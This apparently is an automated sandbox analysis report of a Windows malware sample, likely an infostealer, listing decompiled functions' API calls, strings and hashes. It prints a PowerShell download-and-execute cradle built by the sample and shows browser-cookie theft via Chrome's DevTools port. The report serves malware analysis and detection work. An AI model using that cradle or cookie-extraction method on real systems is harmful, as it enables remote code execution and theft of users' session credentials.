                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen
                                    • String ID: f
                                    • API String ID: 2762123234-1993550816
                                    • Opcode ID: d7b1cfb113c66b775772f2e99c3b88f4e794ccafc9d0a0828f390f13a559fa19
                                    • Instruction ID: 4d250a4fc3ba4486ddbc6681aaf44f46ca28fe60e2deffb7004f72e44305700b
                                    • Opcode Fuzzy Hash: d7b1cfb113c66b775772f2e99c3b88f4e794ccafc9d0a0828f390f13a559fa19
                                    • Instruction Fuzzy Hash: 22B1C33091151A9BCB32EFA4DD49AAFB3B9BF84310F094439B429D7244DB78DD41EB92
                                    Function 00F847E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,00F772A4), ref: 00F847E6
                                    • GetProcAddress.KERNEL32(00000000,connect), ref: 00F847FC
                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00F8480D
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00F8481E
                                    • GetProcAddress.KERNEL32(00000000,htons), ref: 00F8482F
                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00F84840
                                    • GetProcAddress.KERNEL32(00000000,recv), ref: 00F84851
                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 00F84862
                                    • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00F84873
                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00F84884
                                    • GetProcAddress.KERNEL32(00000000,send), ref: 00F84895
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                    • API String ID: 2238633743-3087812094
                                    • Opcode ID: 47bcf820c5bd5c7c5036965877c11168c3054faf0eb937d96277cbb8f09885f0
                                    • Instruction ID: a33f05e00b957e68b08bf3450f5eecebb536e1a064440a07de0bec36c5d5298e
                                    • Opcode Fuzzy Hash: 47bcf820c5bd5c7c5036965877c11168c3054faf0eb937d96277cbb8f09885f0
                                    • Instruction Fuzzy Hash: 3D1100B1956738AFDB39DFB4A81DA553ABCBB0AB09308083EF171D2148D6F484D0EB55
                                    Function 00F7BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7BE53
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7BE86
                                    • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00F7BE91
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7BEB1
                                    • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00F7BEBD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7BEE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7BEEB
                                    • lstrlen.KERNEL32(')"), ref: 00F7BEF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7BF13
                                    • lstrcat.KERNEL32(00000000,')"), ref: 00F7BF1F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7BF46
                                    • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00F7BF66
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7BF88
                                    • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00F7BF94
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7BFBA
                                    • ShellExecuteEx.SHELL32(?), ref: 00F7C00C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 4016326548-898575020
                                    • Opcode ID: 6d449720e2750eedd5c6c5131dd29df26a63f57e4c7053b7f4612763eaeacf0d
                                    • Instruction ID: dcd894a5595f0a5ebc4cd6addd3abd56ca597431fe8fa4c428c24c47ed7e19ef
                                    • Opcode Fuzzy Hash: 6d449720e2750eedd5c6c5131dd29df26a63f57e4c7053b7f4612763eaeacf0d
                                    • Instruction Fuzzy Hash: 7661E670E116099BCF21AFF48C896AF7BB8AF45714F04443AF529D7201DB38D941BB92
                                    Function 00F81820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F8184F
                                    • lstrlen.KERNEL32(00A87328), ref: 00F81860
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81887
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81892
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F818C1
                                    • lstrlen.KERNEL32(00F94FA0), ref: 00F818D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F818F4
                                    • lstrcat.KERNEL32(00000000,00F94FA0), ref: 00F81900
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F8192F
                                    • lstrlen.KERNEL32(00A87338), ref: 00F81945
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F8196C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81977
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F819A6
                                    • lstrlen.KERNEL32(00F94FA0), ref: 00F819B8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F819D9
                                    • lstrcat.KERNEL32(00000000,00F94FA0), ref: 00F819E5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81A14
                                    • lstrlen.KERNEL32(00A87238), ref: 00F81A2A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81A51
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81A5C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81A8B
                                    • lstrlen.KERNEL32(00A87248), ref: 00F81AA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81AC8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81AD3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81B02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1049500425-0
                                    • Opcode ID: ce87a37ec888bece2718da8d94e7625fcad53174ad867cc002575da72c254994
                                    • Instruction ID: 9ec2bdaebe20c66a70752b6a98496d6ecdab99e69ce5b7ba76ee33b6e9dde964
                                    • Opcode Fuzzy Hash: ce87a37ec888bece2718da8d94e7625fcad53174ad867cc002575da72c254994
                                    • Instruction Fuzzy Hash: EC9152B1A017079FDB34AFB5DC89A56B7ECBF14314B14453CA8A6C3241DB78E842EB60
                                    Function 00F74760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74793
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00F747C5
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74812
                                    • lstrlen.KERNEL32(00F94B60), ref: 00F7481D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7483A
                                    • lstrcat.KERNEL32(00000000,00F94B60), ref: 00F74846
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7486B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74898
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F748A3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F748CA
                                    • StrStrA.SHLWAPI(?,00000000), ref: 00F748DC
                                    • lstrlen.KERNEL32(?), ref: 00F748F0
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74931
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F749B8
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F749E1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74A0A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74A30
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74A5D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 4107348322-3310892237
                                    • Opcode ID: 0a7555b6b289656ebb1af2b44635676b3410945e97d94c0472a0db29db54f13c
                                    • Instruction ID: 85599b7739d58c9f45f229474a5c24aacffd542dcd044a6532debc7c6fb4c6db
                                    • Opcode Fuzzy Hash: 0a7555b6b289656ebb1af2b44635676b3410945e97d94c0472a0db29db54f13c
                                    • Instruction Fuzzy Hash: 30B1A571E1160A9BDB35EFB4DD869AE77B9AF44310F048439F85997201DB38FC01AB92
                                    Function 00F692B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F690C0: InternetOpenA.WININET(00F8CFEC,00000001,00000000,00000000,00000000), ref: 00F690DF
                                      • Part of subcall function 00F690C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00F690FC
                                      • Part of subcall function 00F690C0: InternetCloseHandle.WININET(00000000), ref: 00F69109
                                    • strlen.MSVCRT ref: 00F692E1
                                    • strlen.MSVCRT ref: 00F692FA
                                      • Part of subcall function 00F68980: std::_Xinvalid_argument.LIBCPMT ref: 00F68996
                                    • strlen.MSVCRT ref: 00F69399
                                    • strlen.MSVCRT ref: 00F693E6
                                    • lstrcat.KERNEL32(?,cookies), ref: 00F69547
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F69559
                                    • lstrcat.KERNEL32(?,?), ref: 00F6956A
                                    • lstrcat.KERNEL32(?,00F94B98), ref: 00F6957C
                                    • lstrcat.KERNEL32(?,?), ref: 00F6958D
                                    • lstrcat.KERNEL32(?,.txt), ref: 00F6959F
                                    • lstrlen.KERNEL32(?), ref: 00F695B6
                                    • lstrlen.KERNEL32(?), ref: 00F695DB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F69614
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 1201316467-3542011879
                                    • Opcode ID: 07c77cd9abbe1fef54e055ee659627c5c8be20ce4e480a1b4a6e2d3d88cd4e11
                                    • Instruction ID: 44b592acefddd4bd486f3be5db538a50e4a53e4057a502a27d84028271bf2e9b
                                    • Opcode Fuzzy Hash: 07c77cd9abbe1fef54e055ee659627c5c8be20ce4e480a1b4a6e2d3d88cd4e11
                                    • Instruction Fuzzy Hash: 6BE14670E14218DBDF14DFA8C880ADEBBB9FF48300F1484A9E519A7241DB75AE45EF91
                                    Function 00F7D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00F7D9A1
                                    • memset.MSVCRT ref: 00F7D9B3
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7D9DB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7DA0E
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7DA1C
                                    • lstrcat.KERNEL32(?,00A9E490), ref: 00F7DA36
                                    • lstrcat.KERNEL32(?,?), ref: 00F7DA4A
                                    • lstrcat.KERNEL32(?,00A9CFF8), ref: 00F7DA5E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7DA8E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F7DA95
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7DAFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2367105040-0
                                    • Opcode ID: c218790f079433fac7d7bcdb24ac7b14b350917d052a12daf65e45fa17cc6f10
                                    • Instruction ID: 4019c92540a9efc7ceca8afe74fcfda927272bbd0ef467cc718301b4d7059e36
                                    • Opcode Fuzzy Hash: c218790f079433fac7d7bcdb24ac7b14b350917d052a12daf65e45fa17cc6f10
                                    • Instruction Fuzzy Hash: 4EB1C271D102199FDB20EFA4DC849EE77B8FF88310F448469E52AE7241D7349E45EB91
                                    Function 00F6B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6B330
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B37E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B3A9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6B3B1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B3D9
                                    • lstrlen.KERNEL32(00F94C50), ref: 00F6B450
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B474
                                    • lstrcat.KERNEL32(00000000,00F94C50), ref: 00F6B480
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B4A9
                                    • lstrlen.KERNEL32(00000000), ref: 00F6B52D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B557
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6B55F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B587
                                    • lstrlen.KERNEL32(00F94AD4), ref: 00F6B5FE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B622
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F6B62E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B65E
                                    • lstrlen.KERNEL32(?), ref: 00F6B767
                                    • lstrlen.KERNEL32(?), ref: 00F6B776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B79E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
